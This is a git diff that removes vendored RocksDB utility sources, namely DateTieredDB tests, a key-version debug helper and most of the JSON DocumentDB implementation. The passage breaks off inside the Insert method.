-  ASSERT_TRUE(date_tiered_db_.get() != nullptr);
-  // Only default column family
-  ASSERT_EQ(1, GetColumnFamilyCount());
-
-  // Create key value pairs to insert
-  KVMap map_insert;
-  MakeKVMap(kSampleSize_, &map_insert);
-  for (auto& kv : map_insert) {
-    ASSERT_OK(date_tiered_db_->Put(wopts, kv.first, kv.second));
-  }
-  // A time series column family is created
-  ASSERT_EQ(2, GetColumnFamilyCount());
-
-  Sleep(2);
-  KVMap map_insert2;
-  MakeKVMap(kSampleSize_, &map_insert2);
-  for (auto& kv : map_insert2) {
-    ASSERT_OK(date_tiered_db_->Put(wopts, kv.first, kv.second));
-  }
-  // Another time series column family is created
-  ASSERT_EQ(3, GetColumnFamilyCount());
-
-  Sleep(4);
-
-  // Data should not be found in database
-  for (auto& kv : map_insert) {
-    std::string value;
-    auto s = date_tiered_db_->Get(ropts, kv.first, &value);
-    ASSERT_TRUE(s.IsNotFound());
-  }
-
-  // Explicitly drop obsolete column families
-  date_tiered_db_->DropObsoleteColumnFamilies();
-
-  // The first column family is deleted from database
-  ASSERT_EQ(2, GetColumnFamilyCount());
-
-  CloseDateTieredDB();
-}
-
-// Puts a set of values and checks its presence using iterator during ttl
-TEST_F(DateTieredTest, IteratorLifeCycle) {
-  WriteOptions wopts;
-  ReadOptions ropts;
-
-  // T=0, open the database and insert data
-  OpenDateTieredDB(2, 2);
-  ASSERT_TRUE(date_tiered_db_.get() != nullptr);
-
-  // Create key value pairs to insert
-  KVMap map_insert;
-  MakeKVMap(kSampleSize_, &map_insert);
-  Iterator* dbiter;
-
-  // Put data in database
-  for (auto& kv : map_insert) {
-    ASSERT_OK(date_tiered_db_->Put(wopts, kv.first, kv.second));
-  }
-
-  Sleep(1);
-  ASSERT_EQ(2, GetColumnFamilyCount());
-  // T=1, keys should still reside in database
-  dbiter = date_tiered_db_->NewIterator(ropts);
-  dbiter->SeekToFirst();
-  for (auto& kv : map_insert) {
-    ASSERT_TRUE(dbiter->Valid());
-    ASSERT_EQ(0, dbiter->value().compare(kv.second));
-    dbiter->Next();
-  }
-  delete dbiter;
-
-  Sleep(4);
-  // T=5, keys should not be retrieved
-  for (auto& kv : map_insert) {
-    std::string value;
-    auto s = date_tiered_db_->Get(ropts, kv.first, &value);
-    ASSERT_TRUE(s.IsNotFound());
-  }
-
-  // Explicitly drop obsolete column families
-  date_tiered_db_->DropObsoleteColumnFamilies();
-
-  // Only default column family
-  ASSERT_EQ(1, GetColumnFamilyCount());
-
-  // Empty iterator
-  dbiter = date_tiered_db_->NewIterator(ropts);
-  dbiter->Seek(map_insert.begin()->first);
-  ASSERT_FALSE(dbiter->Valid());
-  delete dbiter;
-
-  CloseDateTieredDB();
-}
-
-// Iterator should be able to merge data from multiple column families
-TEST_F(DateTieredTest, IteratorMerge) {
-  WriteOptions wopts;
-  ReadOptions ropts;
-
-  // T=0, open the database and insert data
-  OpenDateTieredDB(4, 2);
-  ASSERT_TRUE(date_tiered_db_.get() != nullptr);
-
-  Iterator* dbiter;
-
-  // Put data in database
-  KVMap map_insert1;
-  MakeKVMap(kSampleSize_, &map_insert1);
-  for (auto& kv : map_insert1) {
-    ASSERT_OK(date_tiered_db_->Put(wopts, kv.first, kv.second));
-  }
-  ASSERT_EQ(2, GetColumnFamilyCount());
-
-  Sleep(2);
-  // Put more data
-  KVMap map_insert2;
-  MakeKVMap(kSampleSize_, &map_insert2);
-  for (auto& kv : map_insert2) {
-    ASSERT_OK(date_tiered_db_->Put(wopts, kv.first, kv.second));
-  }
-  // Multiple column families for time series data
-  ASSERT_EQ(3, GetColumnFamilyCount());
-
-  // Iterator should be able to merge data from different column families
-  dbiter = date_tiered_db_->NewIterator(ropts);
-  dbiter->SeekToFirst();
-  KVMap::iterator iter1 = map_insert1.begin();
-  KVMap::iterator iter2 = map_insert2.begin();
-  for (; iter1 != map_insert1.end() && iter2 != map_insert2.end();
-       iter1++, iter2++) {
-    ASSERT_TRUE(dbiter->Valid());
-    ASSERT_EQ(0, dbiter->value().compare(iter1->second));
-    dbiter->Next();
-
-    ASSERT_TRUE(dbiter->Valid());
-    ASSERT_EQ(0, dbiter->value().compare(iter2->second));
-    dbiter->Next();
-  }
-  delete dbiter;
-
-  CloseDateTieredDB();
-}
-
-}  //  namespace rocksdb
-
-// A black-box test for the DateTieredDB around rocksdb
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as DateTieredDB is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/debug.cc b/thirdparty/rocksdb/utilities/debug.cc
deleted file mode 100644
index ce0b958..0000000
--- a/thirdparty/rocksdb/utilities/debug.cc
+++ /dev/null
@@ -1,55 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/utilities/debug.h"
-
-#include "db/db_impl.h"
-
-namespace rocksdb {
-
-Status GetAllKeyVersions(DB* db, Slice begin_key, Slice end_key,
-                         std::vector<KeyVersion>* key_versions) {
-  assert(key_versions != nullptr);
-  key_versions->clear();
-
-  DBImpl* idb = static_cast<DBImpl*>(db->GetRootDB());
-  auto icmp = InternalKeyComparator(idb->GetOptions().comparator);
-  RangeDelAggregator range_del_agg(icmp, {} /* snapshots */);
-  Arena arena;
-  ScopedArenaIterator iter(idb->NewInternalIterator(&arena, &range_del_agg));
-
-  if (!begin_key.empty()) {
-    InternalKey ikey;
-    ikey.SetMaxPossibleForUserKey(begin_key);
-    iter->Seek(ikey.Encode());
-  } else {
-    iter->SeekToFirst();
-  }
-
-  for (; iter->Valid(); iter->Next()) {
-    ParsedInternalKey ikey;
-    if (!ParseInternalKey(iter->key(), &ikey)) {
-      return Status::Corruption("Internal Key [" + iter->key().ToString() +
-                                "] parse error!");
-    }
-
-    if (!end_key.empty() &&
-        icmp.user_comparator()->Compare(ikey.user_key, end_key) > 0) {
-      break;
-    }
-
-    key_versions->emplace_back(ikey.user_key.ToString() /* _user_key */,
-                               iter->value().ToString() /* _value */,
-                               ikey.sequence /* _sequence */,
-                               static_cast<int>(ikey.type) /* _type */);
-  }
-  return Status::OK();
-}
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/document/document_db.cc b/thirdparty/rocksdb/utilities/document/document_db.cc
deleted file mode 100644
index f7b5b3b..0000000
--- a/thirdparty/rocksdb/utilities/document/document_db.cc
+++ /dev/null
@@ -1,1193 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/utilities/document_db.h"
-
-#include "rocksdb/cache.h"
-#include "rocksdb/table.h"
-#include "rocksdb/filter_policy.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/db.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/utilities/json_document.h"
-#include "util/coding.h"
-#include "util/mutexlock.h"
-#include "port/port.h"
-
-namespace rocksdb {
-
-// IMPORTANT NOTE: Secondary index column families should be very small and
-// generally fit in memory. Assume that accessing secondary index column
-// families is much faster than accessing primary index (data heap) column
-// family. Accessing a key (i.e. checking for existence) from a column family in
-// RocksDB is not much faster than accessing both key and value since they are
-// kept together and loaded from storage together.
-
-namespace {
-// < 0   <=>  lhs < rhs
-// == 0  <=>  lhs == rhs
-// > 0   <=>  lhs == rhs
-// TODO(icanadi) move this to JSONDocument?
-int DocumentCompare(const JSONDocument& lhs, const JSONDocument& rhs) {
-  assert(lhs.IsObject() == false && rhs.IsObject() == false &&
-         lhs.type() == rhs.type());
-
-  switch (lhs.type()) {
-    case JSONDocument::kNull:
-      return 0;
-    case JSONDocument::kBool:
-      return static_cast<int>(lhs.GetBool()) - static_cast<int>(rhs.GetBool());
-    case JSONDocument::kDouble: {
-      double res = lhs.GetDouble() - rhs.GetDouble();
-      return res == 0.0 ? 0 : (res < 0.0 ? -1 : 1);
-    }
-    case JSONDocument::kInt64: {
-      int64_t res = lhs.GetInt64() - rhs.GetInt64();
-      return res == 0 ? 0 : (res < 0 ? -1 : 1);
-    }
-    case JSONDocument::kString:
-      return Slice(lhs.GetString()).compare(Slice(rhs.GetString()));
-    default:
-      assert(false);
-  }
-  return 0;
-}
-}  // namespace
-
-class Filter {
- public:
-  // returns nullptr on parse failure
-  static Filter* ParseFilter(const JSONDocument& filter);
-
-  struct Interval {
-    JSONDocument upper_bound;
-    JSONDocument lower_bound;
-    bool upper_inclusive;
-    bool lower_inclusive;
-    Interval()
-        : upper_bound(),
-          lower_bound(),
-          upper_inclusive(false),
-          lower_inclusive(false) {}
-    Interval(const JSONDocument& ub, const JSONDocument& lb, bool ui, bool li)
-        : upper_bound(ub),
-          lower_bound(lb),
-          upper_inclusive(ui),
-          lower_inclusive(li) {
-    }
-
-    void UpdateUpperBound(const JSONDocument& ub, bool inclusive);
-    void UpdateLowerBound(const JSONDocument& lb, bool inclusive);
-  };
-
-  bool SatisfiesFilter(const JSONDocument& document) const;
-  const Interval* GetInterval(const std::string& field) const;
-
- private:
-  explicit Filter(const JSONDocument& filter) : filter_(filter.Copy()) {
-    assert(filter_.IsOwner());
-  }
-
-  // copied from the parameter
-  const JSONDocument filter_;
-  // constant after construction
-  std::unordered_map<std::string, Interval> intervals_;
-};
-
-void Filter::Interval::UpdateUpperBound(const JSONDocument& ub,
-                                        bool inclusive) {
-  bool update = upper_bound.IsNull();
-  if (!update) {
-    int cmp = DocumentCompare(upper_bound, ub);
-    update = (cmp > 0) || (cmp == 0 && !inclusive);
-  }
-  if (update) {
-    upper_bound = ub;
-    upper_inclusive = inclusive;
-  }
-}
-
-void Filter::Interval::UpdateLowerBound(const JSONDocument& lb,
-                                        bool inclusive) {
-  bool update = lower_bound.IsNull();
-  if (!update) {
-    int cmp = DocumentCompare(lower_bound, lb);
-    update = (cmp < 0) || (cmp == 0 && !inclusive);
-  }
-  if (update) {
-    lower_bound = lb;
-    lower_inclusive = inclusive;
-  }
-}
-
-Filter* Filter::ParseFilter(const JSONDocument& filter) {
-  if (filter.IsObject() == false) {
-    return nullptr;
-  }
-
-  std::unique_ptr<Filter> f(new Filter(filter));
-
-  for (const auto& items : f->filter_.Items()) {
-    if (items.first.size() && items.first[0] == '$') {
-      // fields starting with '$' are commands
-      continue;
-    }
-    assert(f->intervals_.find(items.first) == f->intervals_.end());
-    if (items.second.IsObject()) {
-      if (items.second.Count() == 0) {
-        // uhm...?
-        return nullptr;
-      }
-      Interval interval;
-      for (const auto& condition : items.second.Items()) {
-        if (condition.second.IsObject() || condition.second.IsArray()) {
-          // comparison operators not defined on objects. invalid array
-          return nullptr;
-        }
-        // comparison operators:
-        if (condition.first == "$gt") {
-          interval.UpdateLowerBound(condition.second, false);
-        } else if (condition.first == "$gte") {
-          interval.UpdateLowerBound(condition.second, true);
-        } else if (condition.first == "$lt") {
-          interval.UpdateUpperBound(condition.second, false);
-        } else if (condition.first == "$lte") {
-          interval.UpdateUpperBound(condition.second, true);
-        } else {
-          // TODO(icanadi) more logical operators
-          return nullptr;
-        }
-      }
-      f->intervals_.insert({items.first, interval});
-    } else {
-      // equality
-      f->intervals_.insert(
-          {items.first, Interval(items.second,
-                                 items.second, true, true)});
-    }
-  }
-
-  return f.release();
-}
-
-const Filter::Interval* Filter::GetInterval(const std::string& field) const {
-  auto itr = intervals_.find(field);
-  if (itr == intervals_.end()) {
-    return nullptr;
-  }
-  // we can do that since intervals_ is constant after construction
-  return &itr->second;
-}
-
-bool Filter::SatisfiesFilter(const JSONDocument& document) const {
-  for (const auto& interval : intervals_) {
-    if (!document.Contains(interval.first)) {
-      // doesn't have the value, doesn't satisfy the filter
-      // (we don't support null queries yet)
-      return false;
-    }
-    auto value = document[interval.first];
-    if (!interval.second.upper_bound.IsNull()) {
-      if (value.type() != interval.second.upper_bound.type()) {
-        // no cross-type queries yet
-        // TODO(icanadi) do this at least for numbers!
-        return false;
-      }
-      int cmp = DocumentCompare(interval.second.upper_bound, value);
-      if (cmp < 0 || (cmp == 0 && interval.second.upper_inclusive == false)) {
-        // bigger (or equal) than upper bound
-        return false;
-      }
-    }
-    if (!interval.second.lower_bound.IsNull()) {
-      if (value.type() != interval.second.lower_bound.type()) {
-        // no cross-type queries yet
-        return false;
-      }
-      int cmp = DocumentCompare(interval.second.lower_bound, value);
-      if (cmp > 0 || (cmp == 0 && interval.second.lower_inclusive == false)) {
-        // smaller (or equal) than the lower bound
-        return false;
-      }
-    }
-  }
-  return true;
-}
-
-class Index {
- public:
-  Index() = default;
-  virtual ~Index() {}
-
-  virtual const char* Name() const = 0;
-
-  // Functions that are executed during write time
-  // ---------------------------------------------
-  // GetIndexKey() generates a key that will be used to index document and
-  // returns the key though the second std::string* parameter
-  virtual void GetIndexKey(const JSONDocument& document,
-                           std::string* key) const = 0;
-  // Keys generated with GetIndexKey() will be compared using this comparator.
-  // It should be assumed that there will be a suffix added to the index key
-  // according to IndexKey implementation
-  virtual const Comparator* GetComparator() const = 0;
-
-  // Functions that are executed during query time
-  // ---------------------------------------------
-  enum Direction {
-    kForwards,
-    kBackwards,
-  };
-  // Returns true if this index can provide some optimization for satisfying
-  // filter. False otherwise
-  virtual bool UsefulIndex(const Filter& filter) const = 0;
-  // For every filter (assuming UsefulIndex()) there is a continuous interval of
-  // keys in the index that satisfy the index conditions. That interval can be
-  // three things:
-  // * [A, B]
-  // * [A, infinity>
-  // * <-infinity, B]
-  //
-  // Query engine that uses this Index for optimization will access the interval
-  // by first calling Position() and then iterating in the Direction (returned
-  // by Position()) while ShouldContinueLooking() is true.
-  // * For [A, B] interval Position() will Seek() to A and return kForwards.
-  // ShouldContinueLooking() will be true until the iterator value gets beyond B
-  // -- then it will return false
-  // * For [A, infinity> Position() will Seek() to A and return kForwards.
-  // ShouldContinueLooking() will always return true
-  // * For <-infinity, B] Position() will Seek() to B and return kBackwards.
-  // ShouldContinueLooking() will always return true (given that iterator is
-  // advanced by calling Prev())
-  virtual Direction Position(const Filter& filter,
-                             Iterator* iterator) const = 0;
-  virtual bool ShouldContinueLooking(const Filter& filter,
-                                     const Slice& secondary_key,
-                                     Direction direction) const = 0;
-
-  // Static function that is executed when Index is created
-  // ---------------------------------------------
-  // Create Index from user-supplied description. Return nullptr on parse
-  // failure.
-  static Index* CreateIndexFromDescription(const JSONDocument& description,
-                                           const std::string& name);
-
- private:
-  // No copying allowed
-  Index(const Index&);
-  void operator=(const Index&);
-};
-
-// Encoding helper function
-namespace {
-std::string InternalSecondaryIndexName(const std::string& user_name) {
-  return "index_" + user_name;
-}
-
-// Don't change these, they are persisted in secondary indexes
-enum JSONPrimitivesEncoding : char {
-  kNull = 0x1,
-  kBool = 0x2,
-  kDouble = 0x3,
-  kInt64 = 0x4,
-  kString = 0x5,
-};
-
-// encodes simple JSON members (meaning string, integer, etc)
-// the end result of this will be lexicographically compared to each other
-bool EncodeJSONPrimitive(const JSONDocument& json, std::string* dst) {
-  // TODO(icanadi) revise this at some point, have a custom comparator
-  switch (json.type()) {
-    case JSONDocument::kNull:
-      dst->push_back(kNull);
-      break;
-    case JSONDocument::kBool:
-      dst->push_back(kBool);
-      dst->push_back(static_cast<char>(json.GetBool()));
-      break;
-    case JSONDocument::kDouble:
-      dst->push_back(kDouble);
-      PutFixed64(dst, static_cast<uint64_t>(json.GetDouble()));
-      break;
-    case JSONDocument::kInt64:
-      dst->push_back(kInt64);
-      {
-        auto val = json.GetInt64();
-        dst->push_back((val < 0) ? '0' : '1');
-        PutFixed64(dst, static_cast<uint64_t>(val));
-      }
-      break;
-    case JSONDocument::kString:
-      dst->push_back(kString);
-      dst->append(json.GetString());
-      break;
-    default:
-      return false;
-  }
-  return true;
-}
-
-}  // namespace
-
-// format of the secondary key is:
-// <secondary_key><primary_key><offset_of_primary_key uint32_t>
-class IndexKey {
- public:
-  IndexKey() : ok_(false) {}
-  explicit IndexKey(const Slice& slice) {
-    if (slice.size() < sizeof(uint32_t)) {
-      ok_ = false;
-      return;
-    }
-    uint32_t primary_key_offset =
-        DecodeFixed32(slice.data() + slice.size() - sizeof(uint32_t));
-    if (primary_key_offset >= slice.size() - sizeof(uint32_t)) {
-      ok_ = false;
-      return;
-    }
-    parts_[0] = Slice(slice.data(), primary_key_offset);
-    parts_[1] = Slice(slice.data() + primary_key_offset,
-                      slice.size() - primary_key_offset - sizeof(uint32_t));
-    ok_ = true;
-  }
-  IndexKey(const Slice& secondary_key, const Slice& primary_key) : ok_(true) {
-    parts_[0] = secondary_key;
-    parts_[1] = primary_key;
-  }
-
-  SliceParts GetSliceParts() {
-    uint32_t primary_key_offset = static_cast<uint32_t>(parts_[0].size());
-    EncodeFixed32(primary_key_offset_buf_, primary_key_offset);
-    parts_[2] = Slice(primary_key_offset_buf_, sizeof(uint32_t));
-    return SliceParts(parts_, 3);
-  }
-
-  const Slice& GetPrimaryKey() const { return parts_[1]; }
-  const Slice& GetSecondaryKey() const { return parts_[0]; }
-
-  bool ok() const { return ok_; }
-
- private:
-  bool ok_;
-  // 0 -- secondary key
-  // 1 -- primary key
-  // 2 -- primary key offset
-  Slice parts_[3];
-  char primary_key_offset_buf_[sizeof(uint32_t)];
-};
-
-class SimpleSortedIndex : public Index {
- public:
-  SimpleSortedIndex(const std::string& field, const std::string& name)
-      : field_(field), name_(name) {}
-
-  virtual const char* Name() const override { return name_.c_str(); }
-
-  virtual void GetIndexKey(const JSONDocument& document, std::string* key) const
-      override {
-    if (!document.Contains(field_)) {
-      if (!EncodeJSONPrimitive(JSONDocument(JSONDocument::kNull), key)) {
-        assert(false);
-      }
-    } else {
-      if (!EncodeJSONPrimitive(document[field_], key)) {
-        assert(false);
-      }
-    }
-  }
-  virtual const Comparator* GetComparator() const override {
-    return BytewiseComparator();
-  }
-
-  virtual bool UsefulIndex(const Filter& filter) const override {
-    return filter.GetInterval(field_) != nullptr;
-  }
-  // REQUIRES: UsefulIndex(filter) == true
-  virtual Direction Position(const Filter& filter,
-                             Iterator* iterator) const override {
-    auto interval = filter.GetInterval(field_);
-    assert(interval != nullptr);  // because index is useful
-    Direction direction;
-
-    const JSONDocument* limit;
-    if (!interval->lower_bound.IsNull()) {
-      limit = &(interval->lower_bound);
-      direction = kForwards;
-    } else {
-      limit = &(interval->upper_bound);
-      direction = kBackwards;
-    }
-
-    std::string encoded_limit;
-    if (!EncodeJSONPrimitive(*limit, &encoded_limit)) {
-      assert(false);
-    }
-    iterator->Seek(Slice(encoded_limit));
-
-    return direction;
-  }
-  // REQUIRES: UsefulIndex(filter) == true
-  virtual bool ShouldContinueLooking(
-      const Filter& filter, const Slice& secondary_key,
-      Index::Direction direction) const override {
-    auto interval = filter.GetInterval(field_);
-    assert(interval != nullptr);  // because index is useful
-    if (direction == kForwards) {
-      if (interval->upper_bound.IsNull()) {
-        // continue looking, no upper bound
-        return true;
-      }
-      std::string encoded_upper_bound;
-      if (!EncodeJSONPrimitive(interval->upper_bound, &encoded_upper_bound)) {
-        // uhm...?
-        // TODO(icanadi) store encoded upper and lower bounds in Filter*?
-        assert(false);
-      }
-      // TODO(icanadi) we need to somehow decode this and use DocumentCompare()
-      int compare = secondary_key.compare(Slice(encoded_upper_bound));
-      // if (current key is bigger than upper bound) OR (current key is equal to
-      // upper bound, but inclusive is false) THEN stop looking. otherwise,
-      // continue
-      return (compare > 0 ||
-              (compare == 0 && interval->upper_inclusive == false))
-                 ? false
-                 : true;
-    } else {
-      assert(direction == kBackwards);
-      if (interval->lower_bound.IsNull()) {
-        // continue looking, no lower bound
-        return true;
-      }
-      std::string encoded_lower_bound;
-      if (!EncodeJSONPrimitive(interval->lower_bound, &encoded_lower_bound)) {
-        // uhm...?
-        // TODO(icanadi) store encoded upper and lower bounds in Filter*?
-        assert(false);
-      }
-      // TODO(icanadi) we need to somehow decode this and use DocumentCompare()
-      int compare = secondary_key.compare(Slice(encoded_lower_bound));
-      // if (current key is smaller than lower bound) OR (current key is equal
-      // to lower bound, but inclusive is false) THEN stop looking. otherwise,
-      // continue
-      return (compare < 0 ||
-              (compare == 0 && interval->lower_inclusive == false))
-                 ? false
-                 : true;
-    }
-
-    assert(false);
-    // this is here just so compiler doesn't complain
-    return false;
-  }
-
- private:
-  std::string field_;
-  std::string name_;
-};
-
-Index* Index::CreateIndexFromDescription(const JSONDocument& description,
-                                         const std::string& name) {
-  if (!description.IsObject() || description.Count() != 1) {
-    // not supported yet
-    return nullptr;
-  }
-  const auto& field = *description.Items().begin();
-  if (field.second.IsInt64() == false || field.second.GetInt64() != 1) {
-    // not supported yet
-    return nullptr;
-  }
-  return new SimpleSortedIndex(field.first, name);
-}
-
-class CursorWithFilterIndexed : public Cursor {
- public:
-  CursorWithFilterIndexed(Iterator* primary_index_iter,
-                          Iterator* secondary_index_iter, const Index* index,
-                          const Filter* filter)
-      : primary_index_iter_(primary_index_iter),
-        secondary_index_iter_(secondary_index_iter),
-        index_(index),
-        filter_(filter),
-        valid_(true),
-        current_json_document_(nullptr) {
-    assert(filter_.get() != nullptr);
-    direction_ = index->Position(*filter_.get(), secondary_index_iter_.get());
-    UpdateIndexKey();
-    AdvanceUntilSatisfies();
-  }
-
-  virtual bool Valid() const override {
-    return valid_ && secondary_index_iter_->Valid();
-  }
-  virtual void Next() override {
-    assert(Valid());
-    Advance();
-    AdvanceUntilSatisfies();
-  }
-  // temporary object. copy it if you want to use it
-  virtual const JSONDocument& document() const override {
-    assert(Valid());
-    return *current_json_document_;
-  }
-  virtual Status status() const override {
-    if (!status_.ok()) {
-      return status_;
-    }
-    if (!primary_index_iter_->status().ok()) {
-      return primary_index_iter_->status();
-    }
-    return secondary_index_iter_->status();
-  }
-
- private:
-  void Advance() {
-    if (direction_ == Index::kForwards) {
-      secondary_index_iter_->Next();
-    } else {
-      secondary_index_iter_->Prev();
-    }
-    UpdateIndexKey();
-  }
-  void AdvanceUntilSatisfies() {
-    bool found = false;
-    while (secondary_index_iter_->Valid() &&
-           index_->ShouldContinueLooking(
-               *filter_.get(), index_key_.GetSecondaryKey(), direction_)) {
-      if (!UpdateJSONDocument()) {
-        // corruption happened
-        return;
-      }
-      if (filter_->SatisfiesFilter(*current_json_document_)) {
-        // we found satisfied!
-        found = true;
-        break;
-      } else {
-        // doesn't satisfy :(
-        Advance();
-      }
-    }
-    if (!found) {
-      valid_ = false;
-    }
-  }
-
-  bool UpdateJSONDocument() {
-    assert(secondary_index_iter_->Valid());
-    primary_index_iter_->Seek(index_key_.GetPrimaryKey());
-    if (!primary_index_iter_->Valid()) {
-      status_ = Status::Corruption(
-          "Inconsistency between primary and secondary index");
-      valid_ = false;
-      return false;
-    }
-    current_json_document_.reset(
-        JSONDocument::Deserialize(primary_index_iter_->value()));
-    assert(current_json_document_->IsOwner());
-    if (current_json_document_.get() == nullptr) {
-      status_ = Status::Corruption("JSON deserialization failed");
-      valid_ = false;
-      return false;
-    }
-    return true;
-  }
-  void UpdateIndexKey() {
-    if (secondary_index_iter_->Valid()) {
-      index_key_ = IndexKey(secondary_index_iter_->key());
-      if (!index_key_.ok()) {
-        status_ = Status::Corruption("Invalid index key");
-        valid_ = false;
-      }
-    }
-  }
-  std::unique_ptr<Iterator> primary_index_iter_;
-  std::unique_ptr<Iterator> secondary_index_iter_;
-  // we don't own index_
-  const Index* index_;
-  Index::Direction direction_;
-  std::unique_ptr<const Filter> filter_;
-  bool valid_;
-  IndexKey index_key_;
-  std::unique_ptr<JSONDocument> current_json_document_;
-  Status status_;
-};
-
-class CursorFromIterator : public Cursor {
- public:
-  explicit CursorFromIterator(Iterator* iter)
-      : iter_(iter), current_json_document_(nullptr) {
-    iter_->SeekToFirst();
-    UpdateCurrentJSON();
-  }
-
-  virtual bool Valid() const override { return status_.ok() && iter_->Valid(); }
-  virtual void Next() override {
-    iter_->Next();
-    UpdateCurrentJSON();
-  }
-  virtual const JSONDocument& document() const override {
-    assert(Valid());
-    return *current_json_document_;
-  };
-  virtual Status status() const override {
-    if (!status_.ok()) {
-      return status_;
-    }
-    return iter_->status();
-  }
-
-  // not part of public Cursor interface
-  Slice key() const { return iter_->key(); }
-
- private:
-  void UpdateCurrentJSON() {
-    if (Valid()) {
-      current_json_document_.reset(JSONDocument::Deserialize(iter_->value()));
-      if (current_json_document_.get() == nullptr) {
-        status_ = Status::Corruption("JSON deserialization failed");
-      }
-    }
-  }
-
-  Status status_;
-  std::unique_ptr<Iterator> iter_;
-  std::unique_ptr<JSONDocument> current_json_document_;
-};
-
-class CursorWithFilter : public Cursor {
- public:
-  CursorWithFilter(Cursor* base_cursor, const Filter* filter)
-      : base_cursor_(base_cursor), filter_(filter) {
-    assert(filter_.get() != nullptr);
-    SeekToNextSatisfies();
-  }
-  virtual bool Valid() const override { return base_cursor_->Valid(); }
-  virtual void Next() override {
-    assert(Valid());
-    base_cursor_->Next();
-    SeekToNextSatisfies();
-  }
-  virtual const JSONDocument& document() const override {
-    assert(Valid());
-    return base_cursor_->document();
-  }
-  virtual Status status() const override { return base_cursor_->status(); }
-
- private:
-  void SeekToNextSatisfies() {
-    for (; base_cursor_->Valid(); base_cursor_->Next()) {
-      if (filter_->SatisfiesFilter(base_cursor_->document())) {
-        break;
-      }
-    }
-  }
-  std::unique_ptr<Cursor> base_cursor_;
-  std::unique_ptr<const Filter> filter_;
-};
-
-class CursorError : public Cursor {
- public:
-  explicit CursorError(Status s) : s_(s) { assert(!s.ok()); }
-  virtual Status status() const override { return s_; }
-  virtual bool Valid() const override { return false; }
-  virtual void Next() override {}
-  virtual const JSONDocument& document() const override {
-    assert(false);
-    // compiler complains otherwise
-    return trash_;
-  }
-
- private:
-  Status s_;
-  JSONDocument trash_;
-};
-
-class DocumentDBImpl : public DocumentDB {
- public:
-  DocumentDBImpl(
-      DB* db, ColumnFamilyHandle* primary_key_column_family,
-      const std::vector<std::pair<Index*, ColumnFamilyHandle*>>& indexes,
-      const Options& rocksdb_options)
-      : DocumentDB(db),
-        primary_key_column_family_(primary_key_column_family),
-        rocksdb_options_(rocksdb_options) {
-    for (const auto& index : indexes) {
-      name_to_index_.insert(
-          {index.first->Name(), IndexColumnFamily(index.first, index.second)});
-    }
-  }
-
-  ~DocumentDBImpl() {
-    for (auto& iter : name_to_index_) {
-      delete iter.second.index;
-      delete iter.second.column_family;
-    }
-    delete primary_key_column_family_;
-  }
-
-  virtual Status CreateIndex(const WriteOptions& write_options,
-                             const IndexDescriptor& index) override {
-    auto index_obj =
-        Index::CreateIndexFromDescription(*index.description, index.name);
-    if (index_obj == nullptr) {
-      return Status::InvalidArgument("Failed parsing index description");
-    }
-
-    ColumnFamilyHandle* cf_handle;
-    Status s =
-        CreateColumnFamily(ColumnFamilyOptions(rocksdb_options_),
-                           InternalSecondaryIndexName(index.name), &cf_handle);
-    if (!s.ok()) {
-      delete index_obj;
-      return s;
-    }
-
-    MutexLock l(&write_mutex_);
-
-    std::unique_ptr<CursorFromIterator> cursor(new CursorFromIterator(
-        DocumentDB::NewIterator(ReadOptions(), primary_key_column_family_)));
-
-    WriteBatch batch;
-    for (; cursor->Valid(); cursor->Next()) {
-      std::string secondary_index_key;
-      index_obj->GetIndexKey(cursor->document(), &secondary_index_key);
-      IndexKey index_key(Slice(secondary_index_key), cursor->key());
-      batch.Put(cf_handle, index_key.GetSliceParts(), SliceParts());
-    }
-
-    if (!cursor->status().ok()) {
-      delete index_obj;
-      return cursor->status();
-    }
-
-    {
-      MutexLock l_nti(&name_to_index_mutex_);
-      name_to_index_.insert(
-          {index.name, IndexColumnFamily(index_obj, cf_handle)});
-    }
-
-    return DocumentDB::Write(write_options, &batch);
-  }
-
-  virtual Status DropIndex(const std::string& name) override {
-    MutexLock l(&write_mutex_);
-
-    auto index_iter = name_to_index_.find(name);
-    if (index_iter == name_to_index_.end()) {
-      return Status::InvalidArgument("No such index");
-    }
-
-    Status s = DropColumnFamily(index_iter->second.column_family);
-    if (!s.ok()) {
-      return s;
-    }
-
-    delete index_iter->second.index;
-    delete index_iter->second.column_family;
-
-    // remove from name_to_index_
-    {
-      MutexLock l_nti(&name_to_index_mutex_);
-      name_to_index_.erase(index_iter);
-    }
-
-    return Status::OK();
-  }
-
-  virtual Status Insert(const WriteOptions& options,
-                        const JSONDocument& document) override {
-    WriteBatch batch;
-
-    if (!document.IsObject()) {
-      return Status::InvalidArgument("Document not an object");
-    }
-    if (!document.Contains(kPrimaryKey)) {
-      return Status::InvalidArgument("No primary key");
-    }
-    auto primary_key = document[kPrimaryKey];
-    if (primary_key.IsNull() ||
-        (!primary_key.IsString() && !primary_key.IsInt64())) {
-      return Status::InvalidArgument(
-          "Primary key format error");
-    }
-    std::string encoded_document;
-    document.Serialize(&encoded_document);
-    std::string primary_key_encoded;
-    if (!EncodeJSONPrimitive(primary_key, &primary_key_encoded)) {
-      // previous call should be guaranteed to pass because of all primary_key
-      // conditions checked before
-      assert(false);
-    }
-    Slice primary_key_slice(primary_key_encoded);
-
-    // Lock now, since we're starting DB operations
-    MutexLock l(&write_mutex_);
-    // check if there is already a document with the same primary key
-    PinnableSlice value;
-    Status s = DocumentDB::Get(ReadOptions(), primary_key_column_family_,
-                               primary_key_slice, &value);
-    if (!s.IsNotFound()) {
-      return s.ok() ? Status::InvalidArgument("Duplicate primary key!") : s;
-    }
